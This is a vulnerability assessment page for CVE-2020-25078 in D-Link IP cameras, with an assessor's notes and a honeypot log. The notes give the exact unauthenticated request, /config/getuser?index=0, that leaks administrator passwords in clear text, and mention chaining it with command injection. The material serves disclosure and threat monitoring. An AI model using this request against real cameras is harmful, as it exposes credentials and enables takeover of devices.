CVE-2020-25078

An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure.

Recent assessments:

kevthehermit at March 04, 2021 12:03am UTC reported:

Vulnerability

The D-LInk DCS-2530L is an IP Camera. This means it is more likely to be a target for botnets / IoT auto exploitation rather than anything else.

Triggering the exploit is very simple its just a GET request to the /config/getuser?index=0" endpoint and it returns the user|password combinations in clear text.

This can be paired with a second vulnerability reported at the same time, an authenticated command injection vuln, to gain access. See the exploited section below for more details.

resources

The original tweets have been deleted but archive.org has them

<https://web.archive.org/web/20200617135938/https://twitter.com/Dogonsecurity/status/1273251236167516161&gt;

In the wild.

My honeypots picked up a couple of pings on this, I am assuming automated scanning by some botnets.

{
    "http_headers": {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-GB,en;q=0.5",
        "Connection": "close",
        "Host": "REDACTED:8080",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
    },
    "http_host": "REDACTED:8080",
    "http_method": "GET",
    "http_path": "/config/getuser",
    "http_post": {},
    "http_query": "/config/getuser?index=0",
    "http_remote": "205.185.122.102",
    "http_scheme": "http",
    "http_version": "HTTP/1.1",
    "src_ip": "205.185.122.102"
}

Assessed Attacker Value: 2
Assessed Attacker Value: 2Assessed Attacker Value: 5